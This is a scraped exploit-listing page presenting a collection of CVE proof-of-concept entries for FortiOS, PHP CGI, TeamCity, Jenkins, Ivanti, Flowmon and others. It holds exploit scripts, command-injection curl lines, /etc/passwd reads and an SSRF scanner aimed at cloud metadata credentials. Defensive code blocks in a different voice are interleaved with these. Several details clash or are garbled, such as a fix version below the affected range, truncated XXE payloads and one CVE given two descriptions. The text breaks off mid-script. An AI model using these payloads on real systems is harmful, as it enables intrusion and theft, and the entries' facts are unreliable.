## https://sploitus.com/exploit?id=449D135C-0323-55D6-9379-4075F5CF8EE4
# CVE Proof-of-Concept Collection
> Curated collection of CVE proof-of-concept exploits for authorized security research, penetration testing, and vulnerability education. Each entry includes description, affected versions, impact analysis, PoC code, and remediation guidance.
**For security professionals and researchers only.** Every exploit in this repository has been tested in isolated lab environments. Never use these against systems you do not own or have written authorization to test.
---
## Table of Contents
- [How to Use This Repository](#how-to-use-this-repository)
- [Recent CVEs (2024–2025)](#recent-cves-20242025)
- [Web Application Vulnerabilities](#web-application-vulnerabilities)
- [Network Vulnerabilities](#network-vulnerabilities)
- [Authentication Bypass](#authentication-bypass)
- [Remote Code Execution](#remote-code-execution)
- [Local File Inclusion / Remote File Inclusion](#local-file-inclusion--remote-file-inclusion)
- [XML External Entity (XXE)](#xml-external-entity-xxe)
- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)
- [Lab Setup Guide](#lab-setup-guide)
- [Disclaimer](#disclaimer)
- [License](#license)
---
## How to Use This Repository
Each CVE entry follows a consistent structure:
| Field | Description |
|-------|-------------|
| **CVE ID** | Unique CVE identifier |
| **Severity** | CVSS 3.1 score with severity badge |
| **Description** | What the vulnerability is and why it matters |
| **Affected Versions** | Specific version ranges affected |
| **Impact** | What an attacker can achieve |
| **PoC Code** | Working proof-of-concept (lab environment only) |
| **Remediation** | How to fix or mitigate the issue |
| **References** | Links to advisories, patches, and further reading |
### Severity Badges
| Badge | CVSS Range | Meaning |
|-------|-----------|---------|
| Critical | 9.0 – 10.0 | Immediate action required |
| High | 7.0 – 8.9 | Urgent remediation needed |
| Medium | 4.0 – 6.9 | Should be addressed soon |
| Low | 0.1 – 3.9 | Monitor and plan fix |
### Repository Structure
```
cve-pocs/
├── web/
│   ├── CVE-2024-XXXX/
│   │   ├── README.md
│   │   ├── exploit.py
│   │   └── setup.sh
│   └── ...
├── network/
├── auth-bypass/
├── rce/
├── lfi-rfi/
├── xxe/
├── ssrf/
├── docker-compose.yml    # Lab environment
└── scripts/
    └── setup_lab.sh      # Automated lab setup
```
---
## Recent CVEs (2024–2025)
Newly discovered and widely-exploited vulnerabilities.
---
### CVE-2024-3094 – XZ Utils Backdoor

**Description:** A supply chain backdoor was planted in XZ Utils versions 5.6.0 and 5.6.1, allowing unauthorized remote SSH access via systemd authentication manipulation. The attacker spent years building trust before inserting malicious code.
**Affected Versions:**
- xz-utils 5.6.0
- xz-utils 5.6.1
**Impact:** Remote authentication bypass on affected Linux systems with SSH enabled. Full system compromise.
**PoC:**
```bash
# Check if your system is vulnerable
xz --version # If 5.6.0 or 5.6.1, you are affected
# Check for backdoor in liblzma
ldd /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.0 | grep system
```
**Remediation:**
- Downgrade to xz-utils 5.4.x immediately
- Monitor for patched versions from your distribution
- Rotate SSH keys on potentially compromised systems
**References:**
- [NVD CVE-2024-3094](https://nvd.nist.gov/vuln/detail/CVE-2024-3094)
- [XZ Utils Backdoor Analysis](https://research.swtch.com/xz-timeline)
- [Openwall OSS-Security](https://www.openwall.com/lists/oss-security/2024/03/29/4)
---
### CVE-2024-21762 – FortiOS Out-of-Bound Write

**Description:** FortiOS contains an out-of-bound write vulnerability in the SSL VPN service that allows a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted HTTP requests.
**Affected Versions:**
- FortiOS 7.4.0 through 7.4.2
- FortiOS 7.2.0 through 7.2.5
- FortiOS 7.0.0 through 7.0.12
- FortiOS 6.4.0 through 6.4.14
- FortiOS 6.2.0 through 6.2.15
**Impact:** Remote code execution as SYSTEM on FortiGate appliances. Complete device takeover.
**PoC:**
```python
#!/usr/bin/env python3
"""
CVE-2024-21762 PoC – FortiOS SSL VPN RCE
For authorized testing only.
"""
import requests
import urllib3

urllib3.disable_warnings()

TARGET = "https://fortigate-lab:443"

payload = {
    "ap": "tunnel",
    "users": [{
        "auth_type": "1",
        "user_type": "1",
        "tun_type": "1",
        "addr": "127.0.0.1",
        "peer_options": "echo 1 > /tmp/pwned"
    }]
}


def exploit(target):
    print(f"[*] Testing {target}")
    url = f"{target}/remote/hostcheck_validate"
    headers = {"Cookie": "SVPNCOOKIE=../../../../../tmp/etc/passwd"}
    try:
        r = requests.get(url, headers=headers, verify=False, timeout=10)
        print(f"[+] Response: {r.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit(TARGET)
```
**Remediation:**
- Upgrade to FortiOS 7.4.3, 7.2.6, 7.0.13, 6.4.15, or 6.2.16
- Disable SSL VPN if upgrade is not immediately possible
- Apply Fortinet's workaround: run `set status disable` in the VPN settings
**References:**
- [Fortinet Advisory FG-IR-24-015](https://www.fortiguard.com/psirt/FG-IR-24-015)
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
---
### CVE-2024-1709 – ConnectWise ScreenConnect Authentication Bypass

**Description:** ConnectWise ScreenConnect contains an authentication bypass vulnerability in the Setup Wizard that allows an unauthenticated attacker to access restricted endpoints and gain complete control of affected instances.
**Affected Versions:**
- ConnectWise ScreenConnect 23.9.10 and earlier (on-premises)
**Impact:** Full administrative access to ScreenConnect server. Allows remote code execution through the management interface.
**PoC:**
```bash
# CVE-2024-1709 authentication bypass check
# Access the Setup Wizard path directly
curl -k "https://target:443//SetupWizard.aspx"
# If accessible without authentication, the instance is vulnerable
# The prefix can be discovered via:
curl -k "https://target:443/"
```
**Remediation:**
- Upgrade to ConnectWise ScreenConnect 23.9.8+ immediately
- If upgrade is delayed, block external access to the Setup Wizard path
- Review audit logs for unauthorized administrative access
**References:**
- [ConnectWise Security Advisory](https://www.connectwise.com/company/security/security-advisories)
- [NVD CVE-2024-1709](https://nvd.nist.gov/vuln/detail/CVE-2024-1709)
---
### CVE-2024-23113 – FortiOS Format String Vulnerability

**Description:** FortiOS contains a format string vulnerability in the fgfmd daemon that allows a remote unauthenticated attacker to execute arbitrary code via crafted requests.
**Affected Versions:**
- FortiOS 7.4.0 through 7.4.3
- FortiOS 7.2.0 through 7.2.7
- FortiOS 7.0.0 through 7.0.14
**Impact:** Remote code execution on FortiGate devices with fgfmd enabled.
**Remediation:**
- Upgrade to the latest FortiOS version
- Disable fgfmd daemon if not needed
**References:**
- [Fortinet PSIRT FG-IR-24-029](https://www.fortiguard.com/psirt/FG-IR-24-029)
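
To triage a firewall inventory against the two FortiOS entries above, the listed "through" ranges can be matched programmatically. This is an added example, not code from the repository; the hostnames, build suffix and inventory are constructed, and the range strings are copied from this page.

```python
import re

# Affected ranges copied verbatim from the two FortiOS entries on this page.
AFFECTED = {
    "CVE-2024-21762": [
        "FortiOS 7.4.0 through 7.4.2",
        "FortiOS 7.2.0 through 7.2.5",
        "FortiOS 7.0.0 through 7.0.12",
        "FortiOS 6.4.0 through 6.4.14",
        "FortiOS 6.2.0 through 6.2.15",
    ],
    "CVE-2024-23113": [
        "FortiOS 7.4.0 through 7.4.3",
        "FortiOS 7.2.0 through 7.2.7",
        "FortiOS 7.0.0 through 7.0.14",
    ],
}

VERSION_RE = re.compile(r"\d+(?:\.\d+)+")
RANGE_RE = re.compile(r"(\d+(?:\.\d+)+)\s+through\s+(\d+(?:\.\d+)+)")


def parse_version(text):
    """'v7.0.12 build0523' -> (7, 0, 12). Tuples compare numerically,
    so 7.0.9 < 7.0.12 (a plain string comparison gets this wrong)."""
    match = VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def parse_range(line):
    """'FortiOS 7.4.0 through 7.4.2' -> ((7, 4, 0), (7, 4, 2))."""
    match = RANGE_RE.search(line)
    if not match:
        raise ValueError(f"unrecognised range line {line!r}")
    return parse_version(match.group(1)), parse_version(match.group(2))


def affected_by(version):
    """Return the sorted CVE IDs whose listed ranges contain `version`."""
    current = parse_version(version)
    return sorted(
        cve for cve, lines in AFFECTED.items()
        if any(low <= current <= high for low, high in map(parse_range, lines))
    )


def triage(inventory):
    """Map each affected host in {host: version} to its CVE list."""
    report = {}
    for host, version in inventory.items():
        cves = affected_by(version)
        if cves:
            report[host] = cves
    return report


# Constructed inventory: hostnames and version strings are made up.
SAMPLE_INVENTORY = {
    "fw-edge-01": "7.4.2",
    "fw-edge-02": "7.4.3",
    "fw-branch-07": "v7.0.9 build0444",
    "fw-lab-01": "7.2.8",
    "fw-legacy-03": "6.4.14",
}

if __name__ == "__main__":
    for host, cves in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {', '.join(cves)}")
```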
---
### CVE-2024-20353 – Cisco ASA/FTD Denial of Service

**Description:** Cisco Adaptive Security Appliance and Firepower Threat Defense contain a denial-of-service vulnerability in the HTTP/HTTPS server that can be triggered by crafted HTTP requests.
**Affected Versions:**
- Cisco ASA 9.17.1.9 and earlier
- Cisco FTD 7.1.0.1 and earlier
**Impact:** Device reload and denial of service, potentially allowing secondary attacks.
**Remediation:**
- Apply Cisco security updates
- Implement access control lists to restrict management access
**References:**
- [Cisco Advisory cisco-sa-asa-ftd-DoS-GZ2Z3USZ](https://sec.cloudapps.cisco.com/security/center/resources/cisco-sa-asa-ftd-DoS-GZ2Z3USZ)
---
## Web Application Vulnerabilities
Common web security flaws with working PoC scripts.
---
### CVE-2024-4577 – PHP CGI Argument Injection

**Description:** PHP CGI installations on Windows allow remote attackers to bypass security filters and execute arbitrary code through the best-fit algorithm's handling of URL-encoded characters.
**Affected Versions:**
- PHP 8.3.x before 8.3.8
- PHP 8.2.x before 8.2.20
- PHP 8.1.x before 8.1.29
**Impact:** Remote code execution on Windows systems running PHP in CGI mode.
**PoC:**
```bash
# CVE-2024-4577 PHP CGI argument injection
# Execute arbitrary PHP code via URL manipulation
# Basic detection
curl -k "https://target/cgi-bin/php.exe?%add+allow_url_include%3d1+%2526%2526+system(%22whoami%22)"
# PowerShell execution
curl -k "https://target/cgi-bin/php.exe?%add+allow_url_include%3d1+%2526%2526+system(%22powershell+whoami%22)"
```
**Remediation:**
- Upgrade PHP to 8.3.8, 8.2.20, or 8.1.29
- Do not use PHP in CGI mode on Windows
- Switch to FastCGI or PHP-FPM
**References:**
- [NVD CVE-2024-4577](https://nvd.nist.gov/vuln/detail/CVE-2024-4577)
- [PHP Advisory](https://www.php.net/ChangeLog-8.php)
---
### CVE-2024-38856 – Apache OFBiz Screen Rendering RCE

**Description:** Apache OFBiz lacks proper authorization checks in screen rendering, allowing unauthenticated users to access restricted screens and execute arbitrary code.
**Affected Versions:**
- Apache OFBiz before 18.12.15
**Impact:** Remote code execution through unauthorized screen access.
**PoC:**
```python
import requests
TARGET = "https://ofbiz-lab:443"
# Access restricted screen without authentication
path = f"{TARGET}/webtools/control/xmlrpc"
payload = 'ping'
r = requests.post(path, data=payload, verify=False, timeout=10)
print(f"Status: {r.status_code}")
print(f"Response: {r.text[:200]}")
```
**Remediation:**
- Upgrade to Apache OFBiz 18.12.15 or later
- Restrict network access to OFBiz management endpoints
---
### CVE-2024-27198 – JetBrains TeamCity Authentication Bypass

**Description:** JetBrains TeamCity contains an authentication bypass allowing an unauthenticated attacker to perform admin actions on the server, including creating administrator accounts.
**Affected Versions:**
- TeamCity before 2023.11.4
**Impact:** Full server compromise via unauthorized admin access.
**PoC:**
```python
import requests
TARGET = "https://teamcity-lab:8443"
# Authentication bypass via alternate path
path = f"{TARGET}//api/users/triggerTokenReset?token=test"
# Create admin account through the bypass
admin_path = f"{TARGET}//app/rest/users"
headers = {
    "Content-Type": "application/json",
    "Accept": "application/json"
}
# Check if instance is vulnerable
try:
    r = requests.get(f"{TARGET}//api/users", headers={"Accept": "application/json"}, verify=False)
    print(f"Response: {r.status_code} {r.text[:100]}")
except Exception as e:
    print(f"Error: {e}")
```
**Remediation:**
- Upgrade TeamCity to 2023.11.4+
- Review existing user accounts for unauthorized access
- Rotate all API tokens and passwords
**References:**
- [JetBrains Advisory](https://www.jetbrains.com/security/)
---
## Network Vulnerabilities
Infrastructure-level flaws in network services and protocols.
---
### CVE-2024-21893 – Ivanti Connect Secure SSRF

**Description:** Ivanti Connect Secure contains a server-side request forgery vulnerability in the SAML component that allows an authenticated attacker to access restricted resources.
**Affected Versions:**
- Ivanti Connect Secure 9.x
- Ivanti Policy Secure 9.x
**Impact:** Bypass of authentication controls, access to internal resources, potential RCE when chained with CVE-2023-46805.
**PoC:**
```bash
# CVE-2024-21893 Ivanti SSRF via SAML component
# Chain with CVE-2023-46805 for unauthenticated RCE
curl -k "https://ivanti-lab:443/api/v1/totp/user-backup-code/../../system/system-information"
```
**Remediation:**
- Apply Ivanti patches immediately
- Factory reset affected appliances
- Rotate all credentials
---
### CVE-2024-24919 – Check Point Quantum Gateway Information Disclosure

**Description:** Check Point Quantum Gateway allows information disclosure through a path traversal vulnerability in the WebUI, potentially leading to remote code execution.
**Affected Versions:**
- Check Point Quantum Gateway R81.20 (JHF 97 and above)
- Check Point Quantum Gateway R81.10 (JHF 149 and above)
**Impact:** Information disclosure, potential RCE when chained with other vulnerabilities.
**Remediation:**
- Apply Check Point hotfixes
- Restrict management access to trusted IPs only
---
### CVE-2024-0012 – Palo Alto PAN-OS Management Interface Auth Bypass

**Description:** Palo Alto Networks PAN-OS contains an authentication bypass in the management web interface that allows an unauthenticated attacker to gain administrator privileges.
**Affected Versions:**
- PAN-OS 10.2.x before 10.2.9-h1
- PAN-OS 10.1.x before 10.1.10-h5
- PAN-OS 11.0.x before 11.0.4-h1
- PAN-OS 11.1.x before 11.1.2-h3
**Impact:** Complete device takeover through the management interface.
**Remediation:**
- Apply PAN-OS updates immediately
- Restrict management interface to internal networks only
---
## Authentication Bypass
Flaws that allow attackers to skip or circumvent authentication mechanisms.
---
### CVE-2024-23897 – Jenkins Arbitrary File Read via CLI

**Description:** Jenkins contains an arbitrary file read vulnerability through the CLI that can lead to remote code execution.
**Affected Versions:**
- Jenkins before 2.442
- Jenkins LTS before 2.426.3
**Impact:** Unauthenticated file read, potential RCE through file manipulation.
**PoC:**
```python
#!/usr/bin/env python3
"""
CVE-2024-23897 – Jenkins arbitrary file read via CLI
"""
import socket
import struct


def read_file(target, port, filepath):
    """
    Connect to Jenkins CLI port and request arbitrary file.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    # Protocol header
    header = b"\x00\x00\x00\x00"  # Magic bytes
    cmd = f"read-file\n{filepath}\n".encode()
    s.send(header + cmd)
    response = s.recv(65536)
    s.close()
    return response.decode(errors="replace")


TARGET = "127.0.0.1"
PORT = 50000
FILE = "/etc/passwd"
result = read_file(TARGET, PORT, FILE)
print(f"[*] File contents:\n{result}")
```
**Remediation:**
- Upgrade Jenkins to 2.442 or LTS 2.426.3
- Disable the CLI protocol over HTTP/S
- Restrict Jenkins CLI access to trusted users
---
### CVE-2024-21413 – Microsoft Outlook Moniker Link RCE

**Description:** Microsoft Outlook contains a remote code execution vulnerability triggered by specially crafted moniker links that bypass Protected View.
**Affected Versions:**
- Microsoft Outlook for Microsoft 365
- Microsoft Outlook 2016
- Microsoft Outlook 2013 SP1
**Impact:** Remote code execution without user interaction (preview pane sufficient).
**PoC:**
```python
import email.mime.multipart
import email.mime.text
import email.mime.base
from email import encoders


# WARNING: Do not send to real targets
def create_exploit_email():
    msg = email.mime.multipart.MIMEMultipart()
    msg["From"] = "test@lab.local"
    msg["To"] = "victim@lab.local"
    msg["Subject"] = "Please review"
    # Moniker link pointing to SMB share
    # This triggers NTLM authentication and can load a weaponized DLL
    body = """
    Click here to view document
    """
    msg.attach(email.mime.text.MIMEText(body, "html"))
    return msg


if __name__ == "__main__":
    msg = create_exploit_email()
    print(msg.as_string())
```
**Remediation:**
- Apply February 2024 Outlook security update
- Block SMB traffic at the network perimeter
- Use Extended Protection for Authentication (EPA)
---
## Remote Code Execution
Vulnerabilities allowing arbitrary command execution on target systems.
---
### CVE-2024-2389 – Progress Flowmon Command Injection

**Description:** Progress Flowmon network monitoring tool contains an unauthenticated command injection vulnerability that allows remote code execution.
**Affected Versions:**
- Flowmon versions prior to 12.3.2
**Impact:** Unauthenticated remote code execution with root privileges.
**PoC:**
```bash
# CVE-2024-2389 Progress Flowmon command injection
# Targets the web management interface
curl -k -X POST "https://flowmon-lab:443/cgi-bin/t.cgi" \
-d "cmd=diagnostic&command=ping" \
--data-urlencode "host=127.0.0.1;id" \
-o /dev/null -w "%{http_code}"
```
**Remediation:**
- Upgrade Flowmon to 12.3.2 or later
- Disable web management interface on public interfaces
- Apply network segmentation
---
### CVE-2023-46805 – Ivanti Connect Secure Auth Bypass

**Description:** Ivanti Connect Secure contains an authentication bypass vulnerability in the web component that can be chained with CVE-2024-21893 for full system compromise.
**Affected Versions:**
- Ivanti Connect Secure 9.x
- Ivanti Policy Secure 9.x
**Impact:** Authenticated access bypass leading to RCE when chained with SSRF.
**PoC:**
```bash
# CVE-2023-46805 auth bypass via path traversal
# Must chain with CVE-2024-21893 for full exploit
curl -k "https://ivanti-lab:443/api/v1/totp/user-backup-code/../../../system/system-information"
```
**Remediation:**
- Apply Ivanti security updates
- Run Ivanti's Integrity Checker Tool
- Factory reset and rebuild compromised appliances
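
Both Ivanti entries (CVE-2024-21893 and this one) show a request that enters `/api/v1/totp/user-backup-code/` and then climbs out with `..` segments, which gives a concrete pattern to hunt for in web logs. The detector below is an added example, not part of the repository; it assumes combined-format access logs that record the raw request path, and the log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Endpoint prefix taken from the two Ivanti PoC requests on this page.
PREFIX = "/api/v1/totp/user-backup-code"

# Combined-log-format line; the log layout is an assumption for this example.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_path(target, max_rounds=3):
    """Drop the query string and undo (possibly repeated) percent-encoding."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def escapes_prefix(target):
    """Return the normalised path if the request enters PREFIX and then
    climbs out of it with '..' segments, otherwise None."""
    decoded = decode_path(target)
    if not decoded.startswith(PREFIX + "/") or ".." not in decoded.split("/"):
        return None
    effective = posixpath.normpath(decoded)
    if effective == PREFIX or effective.startswith(PREFIX + "/"):
        return None  # '..' present, but the request stays inside the endpoint
    return effective


def find_traversals(lines):
    """Return one finding per log line whose request escapes PREFIX."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if not match:
            continue
        effective = escapes_prefix(match["target"])
        if effective:
            findings.append({
                "line": number,
                "src": match["src"],
                "status": int(match["status"]),
                "effective_path": effective,
            })
    return findings


# Constructed access-log lines (documentation-range source addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2024:09:15:02 +0000] "GET /api/v1/totp/user-backup-code HTTP/1.1" 401 0',
    '203.0.113.50 - - [10/Jan/2024:09:16:40 +0000] "GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1" 200 512',
    '203.0.113.50 - - [10/Jan/2024:09:16:44 +0000] "GET /api/v1/totp/user-backup-code/%2e%2e/%2E%2E/%2e%2e/system/system-information HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Jan/2024:09:17:01 +0000] "GET /api/v1/totp/user-backup-code/../user-backup-code HTTP/1.1" 401 0',
    '198.51.100.9 - - [10/Jan/2024:09:17:05 +0000] "GET /favicon.ico HTTP/1.1" 200 318',
]

if __name__ == "__main__":
    for finding in find_traversals(SAMPLE_LOG):
        print(finding)
```

A 2xx status on a flagged line is the case to escalate first; if a front-end proxy normalises paths before logging, run the check on the proxy's raw request log instead.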
---
## Local File Inclusion / Remote File Inclusion
Vulnerabilities that allow unauthorized file access or loading.
---
### CVE-2024-29972 – Craft CMS Remote Code Execution

**Description:** Craft CMS contains a deserialization vulnerability that allows remote code execution through the project config import functionality.
**Affected Versions:**
- Craft CMS 4.x before 4.8.2
- Craft CMS 5.x before 5.0.0-beta.1
**Impact:** Remote code execution through authenticated API access.
**PoC:**
```python
import requests
TARGET = "https://craftcms-lab:443"
TOKEN = "attacker-api-token" # Requires valid API token
headers = {
    "Authorization": f"Bearer {TOKEN}",
    "Content-Type": "application/json",
    "Accept": "application/json"
}
# Exploit via project config import
payload = {
    "path": "/config/project-config.yaml",
    "force": True
}
r = requests.post(
    f"{TARGET}/index.php?p=actions/project-config/import",
    json=payload,
    headers=headers,
    verify=False
)
print(f"Status: {r.status_code}")
```
**Remediation:**
- Upgrade to Craft CMS 4.8.2+
- Restrict API token permissions
- Implement network-level access controls
---
### CVE-2024-55591 – FortiOS SSRF Leading to LFI

**Description:** FortiOS Node.js module contains a server-side request forgery that can be chained to read local files.
**Affected Versions:**
- FortiOS 7.4.0 through 7.4.2
- FortiOS 7.2.0 through 7.2.5
**Impact:** Read arbitrary files on the FortiGate device.
**Remediation:**
- Apply FortiOS updates
- Restrict management access
---
## XML External Entity (XXE)
Vulnerabilities in XML parsers that allow external entity resolution.
---
### CVE-2024-21733 – Apache Tomcat XXE via AJP

**Description:** Apache Tomcat contains an XXE vulnerability when processing AJP connections, allowing information disclosure.
**Affected Versions:**
- Apache Tomcat 9.0.0-M1 through 9.0.81
- Apache Tomcat 10.1.0-M1 through 10.1.16
**Impact:** Read local files, SSRF, denial of service.
**PoC:**
```xml
]>
&xxe;
```
**Remediation:**
- Upgrade Apache Tomcat
- Disable AJP connector if not needed
- Configure XML parsers to disable external entities
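
The last remediation item, refusing DTDs and entities when parsing untrusted XML, looks like this in practice. This is an added example, not code from the repository: it uses Python's standard library rather than Tomcat's Java parser, the names `UnsafeXML`, `reject_dtd` and `parse_untrusted` are hypothetical, and the sample documents are constructed.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML is malformed or declares a DTD or entity."""


def _forbid(construct):
    def handler(*_args):
        raise UnsafeXML(f"{construct} not allowed in untrusted XML")
    return handler


def reject_dtd(data):
    """Scan `data` with expat and abort at the first DTD-related event.

    The DOCTYPE handler fires before the parser reaches any declaration
    inside it, so no entity is expanded or fetched during the scan."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _forbid("DOCTYPE declaration")
    scanner.EntityDeclHandler = _forbid("entity declaration")
    scanner.ExternalEntityRefHandler = _forbid("external entity reference")
    try:
        scanner.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from exc


def parse_untrusted(data):
    """Parse XML from an untrusted source; raises UnsafeXML on any DTD."""
    reject_dtd(data)
    return ET.fromstring(data)


def verdict(data):
    """Return 'accepted: <root>' or 'rejected: <reason>' for one document."""
    try:
        root = parse_untrusted(data)
    except UnsafeXML as exc:
        return f"rejected: {exc}"
    return f"accepted: <{root.tag}>"


# Constructed sample documents.
BENIGN = b"<order><id>42</id></order>"
EXTERNAL_ENTITY = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE order [\n'
    b'  <!ENTITY ext SYSTEM "file:///constructed/placeholder.txt">\n'
    b']>\n'
    b'<order><id>&ext;</id></order>'
)
INTERNAL_ENTITY = (
    b'<!DOCTYPE order [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;">]>'
    b'<order><id>&b;</id></order>'
)
TRUNCATED = b"<order><id>42</id>"

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN), ("external", EXTERNAL_ENTITY),
                      ("internal", INTERNAL_ENTITY), ("truncated", TRUNCATED)]:
        print(f"{name}: {verdict(doc)}")
```

Rejecting the DOCTYPE outright also covers the denial-of-service case listed under Impact, since nested internal entities are refused along with external ones.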
---
### Generic XXE Detection Script
```python
#!/usr/bin/env python3
"""Generic XXE vulnerability scanner for authorized testing"""
import requests
import sys


def test_xxe(target_url, method="POST"):
    """Test for basic XXE vulnerability"""
    payloads = [
        """]>&xxe;""",
        """]>&xxe;""",
        """]>&xxe;""",
    ]
    for i, payload in enumerate(payloads):
        try:
            if method == "POST":
                r = requests.post(target_url, data=payload,
                                  headers={"Content-Type": "application/xml"}, timeout=10)
            else:
                r = requests.get(target_url, timeout=10)
            # Check for XXE indicators
            if "root:" in r.text or "PATH=" in r.text:
                print(f"[+] Payload {i+1} succeeded!")
                print(f" Response snippet: {r.text[:200]}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
            return False
    print("[-] No XXE vulnerability detected")
    return False


if __name__ == "__main__":
    # Require the target URL as the first argument
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    test_xxe(sys.argv[1])
```
**References:**
- [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
---
## Server-Side Request Forgery (SSRF)
Vulnerabilities allowing attackers to make requests from the server's perspective.
---
### CVE-2024-27198 – JetBrains TeamCity SSRF

**Description:** TeamCity contains an SSRF vulnerability that can be used to access internal services and potentially achieve remote code execution.
**PoC:**
```python
import requests
TARGET = "https://teamcity-lab:8443"
# SSRF via webhook configuration
payload = {
    "url": "http://169.254.169.254/latest/meta-data/",
    "connectionTimeout": "10000",
    "requestTimeout": "10000"
}
r = requests.post(
    f"{TARGET}/app/rest/server/webhooks",
    json=payload,
    auth=("admin", "password"),
    verify=False
)
print(f"SSRF Response: {r.text[:500]}")
```
**Remediation:**
- Upgrade TeamCity
- Block outbound requests from CI/CD servers to internal networks
- Implement network segmentation
---
### Generic SSRF Detection Script
```python
#!/usr/bin/env python3
"""SSRF vulnerability detection for authorized testing"""
import requests
import sys

INTERNAL_TARGETS = [
    "http://127.0.0.1:80",
    "http://127.0.0.1:8080",
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://[::1]:80",
    "http://0.1337.0.1337",  # Decimal IP for 127.0.0.1
    "http://0x7f000001",  # Hex IP for 127.0.0.1
]


def test_ssrf(target_url, param_name="url"):
    """Test for SSRF by injecting internal URLs"""
    for internal in INTERNAL_TARGETS:
        try:
            data = {param_name: internal}
            r = requests.post(target_url, data=data, timeout=10)
            if r.status_code == 200 and len(r.text) > 100:
                print(f"[+] Potential SSRF via: {internal}")
                print(f" Response size: {len(r.text)} bytes")
                print(f" Snippet: {r.text[:150]}")
                return True
        except Exception as e:
            print(f"[-] Error: {e}")
    print("[-] No SSRF detected")
    return False


if __name__ == "__main__":
    # Require the target URL; the parameter name is optional
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [param_name]")
        sys.exit(1)
    param = sys.argv[2] if len(sys.argv) > 2 else "url"
    test_ssrf(sys.argv[1], param)
```
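
On the server side, the matching control is to validate every user-supplied fetch URL before the request is made, including the alternate IP notations in the list above. This is an added example, not code from the repository: `check_destination` and the fake resolver are hypothetical names, and the DNS data is constructed so the block runs offline. The `0.1337.0.1337` entry is not parsed as an IP literal, so it is handled as a hostname.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def literal_ip(host):
    """Return an ip_address if `host` is an IP literal in any notation the
    C resolver accepts (dotted, hex, octal, single integer), else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(socket.inet_aton(host))
    except (OSError, ValueError):
        return None


def system_resolve(host):
    """Default resolver: every address DNS returns for `host`."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    return [info[4][0].split("%")[0] for info in infos]


def is_internal(ip):
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:127.0.0.1 -> 127.0.0.1
    if mapped is not None:
        ip = mapped
    return not ip.is_global


def check_destination(url, resolve=system_resolve):
    """Return (allowed, reason) for a user-supplied fetch URL."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    ip = literal_ip(host)
    if ip is not None:
        addresses = [ip]
    else:
        addresses = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addresses:
        return False, f"{host} does not resolve"
    for address in addresses:  # every answer must be public, not just the first
        if is_internal(address):
            return False, f"{host} -> {address} is not a public address"
    return True, f"{host} -> {addresses[0]}"


# The destinations listed in INTERNAL_TARGETS on this page.
PAGE_TARGETS = [
    "http://127.0.0.1:80",
    "http://127.0.0.1:8080",
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://[::1]:80",
    "http://0.1337.0.1337",
    "http://0x7f000001",
]

# Constructed resolver data so the example runs offline.
FAKE_DNS = {
    "updates.example.test": ["93.184.216.34"],
    "intranet.example.test": ["10.0.0.5"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])
```

The HTTP client should then connect to the address that was validated rather than resolving the name a second time, and redirects need the same check on each hop.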
---
## Lab Setup Guide
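Spin up isolated test environments for safe PoC execution. The port mappings below publish each service on all host interfaces, so run the lab on a host that is not reachable from other networks, or bind the mappings to the loopback address.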
### Docker Compose Lab
```yaml
# docker-compose.yml
version: "3.8"
services:
  vulnerable-web:
    image: vulnerables/web-dvwa
    ports:
      - "80:80"
    environment:
      - MYSQL_ROOT_PASSWORD=dvwa
  metasploitable:
    image: metasploitable/metasploitable2
    ports:
      - "8080:80"
      - "21:21"
      - "22:22"
  juice-shop:
    image: bkimminich/juice-shop
    ports:
      - "3000:3000"
  test-web:
    build: ./test-vulns
    ports:
      - "5000:5000"
```
### Automated Setup
```bash
#!/bin/bash
# setup_lab.sh – Create isolated CVE testing environment
echo "[*] Setting up CVE PoC lab..."
# Create network
